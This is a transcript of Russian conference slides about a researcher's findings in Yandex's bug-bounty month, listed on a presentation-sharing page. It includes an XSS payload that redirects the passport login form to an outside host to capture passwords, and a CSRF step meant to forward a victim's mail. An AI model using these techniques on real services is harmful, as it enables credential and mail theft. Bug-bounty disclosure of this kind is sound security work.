Месяц поиска уязвимостей Яндекса опыт участия Эльдар Заитов @kyprizel.

Презентация:



Advertisements
Похожие презентации
Open InfoSec Days Томск, 2011 Глава 1. Атаки на веб-приложения и методы защиты Занятие 2. Cross-site request forgery.
Advertisements

Особенности проведения тестов на проникновение в организациях банковской сферы © , Digital Security Илья Медведовский, к.т.н. Директор Digital.
Почему происходят Epic fail или безопасность в Web Валерий Хвалёв Консультант по ИТ безопасности.
О безопасности сайта думают в последнюю очередь! индивидуальные разработчики думают о безопасности сайтов в самую последнюю очередь клиенты не готовы платить.
Проблемы информационной безопасности by-нета Докладчик: Финансовый директор СООО«Белсек» Мартинкевич Дмитрий Станиславович.
Тестирование безопасности или Security and Access Control Testing.
Тест на проникновение в соответствии с PCI DSS Илья Медведовский Digital Security Директор, к.т.н.
Безопасность Веб-приложений Дмитрий Евтеев Эксперт по информационной безопасности.
Open InfoSec Days Томск, 2011 Глава 1. Атаки на веб-приложения и методы защиты.
Безопасный код © Александр Швец
Юзабилити интернет-магазинов: Что не видят продавцы и покупатели Владимир Ямин Группа юзабилити-экспертов 1point (
Безопасность интернет-проекта Основные угрозы Инструменты безопасности в платформе.
Уязвимость сайтов и обеспечение их безопасности. Цели атак на сайты Получение секретной информации (пароли и т.п.) Получение конфиденциальной информации.
Безопасный поиск в сети ИНТЕРНЕТ. Интернет Интернет – это … … сеть, которая включает в себя …, … и … сети и объединяет миллионы … по всему миру.
Алексей Довжиков Удобство покупателя на сайте – залог успеха в продажах!
Smart-Soft Traffic Inspector. Основные возможности Traffic Inspector: комплексное решение для подключения сети или персонального компьютера к сети Интернет.
Open InfoSec Days Томск, 2011 Глава 1. Атаки на веб-приложения и методы защиты Занятие 6. Автоматизация процесса поиска уязвимостей и их последующей эксплуатации.
Аутентификация в системах Интернет-банкинга Анализ типичных ошибок Сергей Гордейчик Positive Technologies.
Проблемы и уязвимости в системах ДБО © , Digital Security Digital Security.
Что такое Internet?. Internet самая большая и самая известная в мире сеть, объединяющая миллионы компьютеров в огромную сеть сетей, предоставляющая неограниченный.
Транксрипт:

Месяц поиска уязвимостей Яндекса опыт участия Эльдар

Что это было? Что искать: межсайтовый скриптинг (XSS); межсайтовая подделка запросов (CSRF); небезопасное управление сессией; инъекции; ошибки в механизмах аутентификации и авторизации; Где искать: *.yandex.ru, com, com.tr, kz, ua, by, net, st; *.ya.ru. *.moikrug.ru.

Почему искать? Интерес Не часто компании такого уровня дают полный карт-бланш в действиях – хочется посмотреть как всё устроено внутри, в случае успешной атаки; Интерес Понять, каков же реальный уровень защищенности сервисов одной из крупнейших IT компаний в России; Деньги В случае победы, $5k неплохой бонус за работу, сделаную ради интереса.

Что искал RCE, различные переполняшки; SQL injection; Способы проникновения во внутреннюю инфраструктуру; XSS; CSRF;

Как искал Представить, как оно могло бы работать; Сделать легкий ручной fuzzing, посмотреть на реакцию. Где искал mail.yandex.ru

Что нашел Пассивные XSS; Некритичные раскрытия данных; Различные бесполезные tricks; CSRF; да, я знаю, что это lame ;)

XSS уязвимость Доверенный параметр retpath в passport.yandex.ru

XSS exploit Как использовать максимально эффективно? Украсть не сессию, но логин и пароль.

window.onload=function() { document.forms['MainLogin'].action='//kyprizel.net/p.php'; }

Раскрытия Neo2 XML + Oracle PL/SQL Neo2 handlers

Раскрытия Modjs.js …

Tricks Произвольные GET запросы через Ленту в том числе внутри DMZ: blackbox.yandex.net csearch.mail.yandex.net Сканирование портов через mail collector; nothing interesting :(

CSRF ckey Не работающая CSRF защита в интерфейсе neo Как использовать максимально эффективно? - Включить форвардинг писем на свой адрес.

CSRF exploit Step 1 confirm/e=Ut7tUs8g8jFFRbI4JOC%2ALUKGjDmZsg%2ANtGNtsYGO66aSjD%2AjgMzkllOOE UyjbUnVLiRMEBkrx34%3D

CSRF exploit Step 2 PROFIT!